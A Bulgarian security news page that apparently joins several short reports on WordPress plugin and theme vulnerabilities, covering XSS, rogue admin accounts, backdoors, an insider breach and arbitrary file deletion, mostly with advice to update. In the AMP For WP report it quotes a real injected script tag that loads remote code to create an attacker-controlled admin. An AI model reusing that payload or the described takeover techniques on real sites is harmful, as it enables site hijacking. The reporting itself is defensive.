wordpress

Експлоатирана уязвимост в WordPress темата OneTone позволява кражба на сайтове от страна на хакери. Тя е открита от Sucuri, един от най-популярните модули за защита на най-популярната система за управление на съдържание (CMS) в света.

Уязвимостта позволява cross-site scripting (XSS), с който атакуващият инжектира JavaScript код в настройките на темата. С него потребителите на сайта могат да бъдат пренасочени към други, зловредни копия – или изцяло различни страници. Хакерите могат да се възползват от уязвимостта включително и за да крадат сесии на администратори на сайта – като по този начин да се сдобият с неоторизиран достъп до администраторските панели на жертвите си.

[button color=“green“ size=“big“ link=“https://nakedsecurity.sophos.com/2020/04/29/flaw-in-defunct-wordpress-plugin-exploited-to-create-backdoor/“ target=“true“ nofollow=“false“]Прочетете повече по темата тук[/button]

 

Междувременно, беше публикуван ъпдейт на WordPress – версия 5.4.1. Тя идва със 7 запушени уязвимости. Сред тях са няколко XSS  пробойни, позволяващи неоторизирано качване на файлове, редактиране на съдържание и др.

[button color=“green“ size=“big“ link=“https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/“ target=“true“ nofollow=“false“]Прочетете повече по темата тук[/button]

В рубриката Бързи новини подбираме водещи заглавия за вас и споделяме линкове към външни публикации. 

Последен ъпдейт на 4 май 2020 в 12:00 ч.

Първите атаки срещу три WordPress модула – ThemeGrill Demo Importer, Profile Builder и Duplicator – вече са факт. Засегнатите, според WordFence, сайтове, работещи само с Duplicator, са повече от 1 млн.

Ако използвате някоя от следните версии на трите модула, ъпдейтнете ги възможно най-скоро:

• ThemeGrill Demo Importer (версии под 1.6.3) – бъгът в модула позволява не неавтентикирани потребители да се логнат в сайта като администратори и да изтрият цялата му база данни
• Profile Builder free and Pro (версии под 3.1.1) – уязвимостта дава възможност за неавтентикирани потребители да се логнат в сайта като администратори
• Duplicator (версии под 1.3.26) – бъгът в плъгина позволява свалянето на произволни файлове от засегнатите сайтове

[button color=“green“ size=“big“ link=“https://www.bleepingcomputer.com/news/security/multiple-wordpress-plugin-vulnerabilities-actively-being-attacked/“ icon=““ target=“true“ nofollow=“false“]Прочетете повече по темата тук[/button]

 

В рубриката Бързи новини подбираме водещи заглавия за вас и споделяме линкове към външни публикации. 

Последен ъпдейт на 14 август 2019 в 15:46 ч.

Уязвимост в безплатната и платена версия на плъгина за WooCommerce Abandoned Cart позволява кражбата на администраторски акаунти в сайтовете, които го използват, съобщават от производителя му Tyche Softwares. Разкритата в средата на февруари пробойна е отстранена и препоръчваме на потребителите му да ъпдейтнат до най-новата версия. Към момента 42% от ползвателите са го направили, коментират от Tyche Softwares.

По данни на ZDNet с безплатната версия на плъгина работят около 20 000 сайта.

Как работи уязвимостта

Засегнатите плъгини се казват Abandoned Cart Lite (безплатна версия) и Abandoned Cart Pro (платена версия).

Според официалната информация от компанията, уязвимостта позволява на атакуващия да създаде нов потребител с име woouser и имейл в услугата Mailinator (конкретният адрес е [email protected]), който има администраторски права в засегнатия сайт.  Проблемът е открит от потребителка, която е съдействала и за отстраняването му. Подробна техническа информация за самата уязвимост не е предоставена публично от авторите на плъгина с уточнението, че те не искат да разкриват как се осъществяват такива зловредни действия.

Публикации в други медии твърдят, че пробойната в плъгините се дължи на cross-site scripting (XSS) уязвимости. Добавката за WooCommerce (която е и сред най-популярните платформи за електронна търговия в България) позволява на администраторите на сайтовете да следят кои потребители са започнали да пазаруват, но не са завършили поръчките си. Търговците виждат списък с потребители и добавените от тях в кошницата продукти.

Според Defiant security хакерите използват полетата в количката на магазина, за да добавят зловреден код в базата данни на сайта. В последствие, когато администраторът влезе, за да провери списъка с незавършени поръчки и стигне до компрометираната такава, кодът се изпълнява и дава администраторски права на хакерите и опитва да инсталира два бекдора.

Първият работи с цел да създаде горе описания администраторски акаунт.

Вторият създава списък с използваните от платформата WordPress плъгини на сайта, проследява кой е първият деактивиран от тях и подменят съдържанието му, без да го активират. Новият, заразен „плъгин“ позволява отдалечен достъп до сайта.

[box type=“success“ align=““ class=““ width=““]

Какво да направите

1. Проверете списъка си с потребители и потърсете потребителското име Ако има такова, то най-вероятно сайтът ви е компрометиран. Ако имате плъгинг, с който записвате и следите потребителската активност в WordPress, проверете дали с този акаунт са осъществени логини и каква е била дейността му
2. Ъпдейтнете плъгина си до най-новата версия, за да елиминирате пробойната

[/box]

Един от най-популярните WordPress плъгини за мултиезичност WPML е бил компрометиран от бивш служител. Това става ясно от имейл, разпратен до потребителите на компанията (които са над 600,000 души, според официалния ѝ сайт). В официалното съобщение се казва, че бившият служител е оставил backdoor, преди да напусне компанията. С него той е успял да:

• Копира имена и мейли на клиенти на WPML
• Разпратил е мейли до тях
• Спрял е страницата за поръчка на WPML и е публикувал фалшив блог пост от името на компанията

Прочетете и: Четири начина служителите да се превърнат в заплаха за бизнеса ви

Разпратеното фалшиво съобщение е от мним потребител, който твърди, че WPML има „смешни уязвимости в сигурността си, които въпреки всички ъпдейти, позволи два от най-важните ми сайта да бъдат хакнати“, както и че „WPML позволи достъпа до лична информация за хора, които имат минимални способности да програмират.“

Скрийншот от мейла може да видите по-долу:

FYI: someone hacked @wpml‘s website and sent this out to everyone pic.twitter.com/lMml23qUjD

— Ben Word (@retlehs) 19 януари 2019 г.

В официалното съобщение на WPML се казва още, че самият плъгин не е компрометиран, а атакуващият не е модифицирал кода му. Не е компрометирана и финансова информация. Има вероятност обаче акаунтите на потребителите да са компрометирани, тъй като атакуващият се е сдобил с имена и имейли – а съветът на компанията към засегнатите е да сменят паролите си.

WPML е плъгин, който позволява на потребителите да създават сайтове на повече от един език на WordPress.

Уязвимост в популярния плъгин AMP For WP се експлоатира активно, съобщава Wordfence. Приставката, която се използва от поне 100 хил. уебмастъри, позволява създаване на администраторски акаунти и превземане на сайтове.

AMP For WP се използва от администраторите, за да оптимизират сайтовете си за мобилни устройства. На 17 ноември се появи предупреждение, че в плъгина има уязвимост. Тя позволява на регистриран в сайта потребител да създаде акаунт с администраторски права.

@TenableSecurity RE: https://t.co/4bOEVDebIr
Many exploits were discovered by me when I wanted to fix a bug, not @webarx_security. I just never released how to exploit it, because that’s in vain. See https://t.co/01pfQh6Sui for details, which I submitted after the fix went live.

— Sybre Waaijer (@SybreWaaijer) November 17, 2018

Според Wordfence тази уязвимост вече се експлоатира с XSS атака, при която авторът се опитва да инжектира зловреден код в набелязания сайт. При повечето засечени атаки инжектираният код изглежда така: <script src=https://sslapis[.]com/assets/si/stat.js></script>. 

Ако скриптът бъде зареден от браузъра на администратора, той създава нов потребител supportuuser с администраторски права, който е под контрола на авттора на скрипта.

„Тази малуер кампания показва, че статичните XSS уязвимости все още са заплаха. Ако хакерът може да подкара зловреден код в браузъра на администратора на сайта, той може да използва цял набор от техники, с които да поеме контрола над сайта“, коментират от Wordfence.

Преди по-малко от две седмици Wordfence съобщи за уязвимост в друг плъгин, която също позволява превземане на сайтове.
[box type=“success“ align=“alignleft“ class=““ width=““]

Как да се предпазите

Уязвимостта е отстранена във версия 0.9.97.20 на плъгина. Ако сайтът ви използва AMP For WP, обновете го до най-новата налична версия.
[/box]

Популярният плъгин WP GDPR Compliance съдържа уязвимост, с която неоторизиран потребител може да получи администраторски права върху сайта. Уязвимостта засяга над 100 хил. базирани на WordPress сайта, които в момента използват плъгина.

Според Wordfence уязвимостта може да се експлоатира изключително лесно. Достатъчно е злонамерено лице да въведе няколко реда код в онлайн формата на WP GDPR Compliance. С нея потребителите на сайта искат копие от данните си. Изпълнението на кода води до това, че в системата на WordPress може да се създаде нов потребител с администраторски привилегии. Така злонамереното лице може да поеме контрола над сайта.

„Над 100 хил. сайта, работещи с WordPress и използващи WP GDPR Compliance, са били уязвими на тази атака. Критично важно е всички сайтове, които използват този плъгин, да го обновят възможно най-бързо“, коментират от Wordfence.

WP GDPR Compliance е много популярен в България и Европа, тъй като дава възможност на фирмите лесно да приведат сайтовете си в съответствие с GDPR. Уязвимостта съществува във версиите на WP GDPR Compliance до 1.4.2.

В помощните форуми на WordPress са публикувани сигнали от потребители. Те твърдят, че някой инсталира плъгини на сайтовете им. Сигналите датират от средата на октомври, В последствие е установено, че всички хакнати сайтове използват WP GDPR Compliance и именно той е вратичката, през която е получен достъп.

Съвети за бизнеса

Ако вашият сайт  използва този плъгин, влезте в администраторския панел на WordPress и обновете до версия 1.4.3, в която уязвимостта е остранена. Алтернативата е да изключите плъгина.

Уязвимост в един от най-популярните WordPress плъгини за електронна търговия позволява да се поеме контрол върху целия сайт. Откриетието е на Саймън Сканъл от RIPS Tech, която разработва софтуер за анализ на PHP код.

Уязвимостта засяга WooCommerce – популярна в България и по света платформа за онлайн търговия. В момента този плъгин се използва от над 4 млн. активни потребители.

Какъв е проблемът

WordPress използва система с различни рангове потребители: Administrator, Editor, Author и т.н. При инсталирането на WooCommerce в системата се създава потребител с ранг Shop Manager. Той има права да променя привилегиите на останалите категории потребители; дори на администратора на сайта.

Това, разбира се, е опасно. За да предотврати злоупотреби, WooCommerce съдържа ограничителна функция, която забранява на Shop Manager да модифицира администраторския профил.

Проблемът е, че ако плъгинът бъде спрян или изтрит, тази функция престава да действа. Така в системата на WordPress изведнъж се появява потребител, който има права дa модифицира акаунта на администратора.

Самият Shop Manager няма възможност да спре WooCommerce. За сметка на това той има достъп до функцията на WooCommerce за изтриване на логове.

Достъп до целия сайт

Именно тук Сканъл открива уязвимост. Оказва се, че тази функция позволява на Shop Manager да изтрие woocommerce.php – основният файл, който захранва плъгина. Ако той бъде изтрит, WooCommerce спира да работи и Shop Manager може да редактира профила на администратора и да определя какви права има.

За да се осъществи успешна атака, нейният автор първо трябва да има достъп до WooCommerce акаунта. Това може да стане чрез фишинг или вътрешен човек от компанията, която притежава сайта. След като разполага с потребителско име и парола за WooCommerce, той може да превземе целия сайт през плъгина.

[box type=“warning“ align=“alignleft“ class=““ width=““]

Съвети за собственици на онлайн магазини

Уязвимостта е отстранена във версията WooCommerce 3.4.6. Ако сайтът ви е базиран на WordPress и използвате WooCommerce, обновете плъгина до най-новата версия.

[/box]

“Ограничението” при тази уязвимост е, че за да бъде възможно експлоатирането, преди това трябва да се сдобиете с права за четене и запис на медийни файлове. Тоест, за да може злонамерен потребител да се възползва от уязвимостта, той трябва да има права върху системата на минимално ниво “Автор”.

Какви са последствията?

Веднъж сдобил се с необходимите права, злонамерен потребител, който е запознат с уязвимостта може да изтрие всеки файл от инсталацията на WordPress. Под заплаха са и файловете на сървъра, върху който процеса PHP има разрешение за изтриване. Атакуващият може също така да изтрие цяла WordPress инсталация и да заобиколи мерките за сигурност, за да изпълни произволен код на сървъра.

Сред един от файловете, които могат да бъдат изтрити е сърварният конфигурационен файл – .htaccess (който може да съдържа ограничения, свързани със сигурността). Друг важен компонент, с който може да се сдобие атакуващият е съдържанието на wp-config.php (който съдържа идентификационните данни за базата данни). И двата файла са изключително важни за сигурността на инсталацията и достъпа до тях би довел до пълно компрометиране на системата.

Друг подход, които атакуващият може да предприеме е да изтрие wp-config.php и така да задейства процеса на инсталиране на WordPress при следващото посещение на уебсайта. Това от своя страна ще му позволи да премине през процеса на инсталиране и да създаде администраторски акаунти по свой избор, след което да премине към следващата стъпка по изпълнение на произволен код върху машината.

Има ли фикс и как можем сами да си помогнем

Въпреки че в началото на годината от екипа, отговарящ за сигурността на WP беше получено уверение, че проблемът ще бъде отстранен в следващите шест месеца. Проблемът все още е на лице и няма яснота кога ще бъде пусната кръпка.

Тъй като атаката изисква потребителски акаунт, с уязвимостта не може да бъде злоупотребено масово, с цел компрометиране на произволни WordPress сайтове. Въпреки всичко, ето какви мерки можем да предприемем ако все пак се налага върху системата да работи повече от един потребител с минимум авторска роля.

Като за начало се уверете, че процесът на PHP разполага само с толкова права, колкото са необходими за безпроблемната работа на сайта. Тоест – прилагайте златното правило за “least privileges”, когато това е възможно

Също така, като временно решение можете да добавите следния код във файла functions.php, върху темата, която използвате.

add_filter( 'wp_update_attachment_metadata', 'rips_unlink_tempfix' );

function rips_unlink_tempfix( $data ) {

if( isset($data['thumb']) ) {

$data['thumb'] = basename($data['thumb']);

}

return $data;

}

Това, което прави посочения код е да се “закачи” за функцията ‘wp_update_attachment_metadata’ и да се увери, че данните в променливата ‘thumb’ нямат непозволени стойности, които биха позволили експлоатация през path traversal.

И не на последно място, винаги използвайте защитна стена с възможност за WAF (Web Application Firewall). Конфигуриран “правилно”, този инструмент може да ви спести доста главоболия.

Бъдете винаги в крак с новините от света на информационната сигурност – станете наши фенове във Facebook.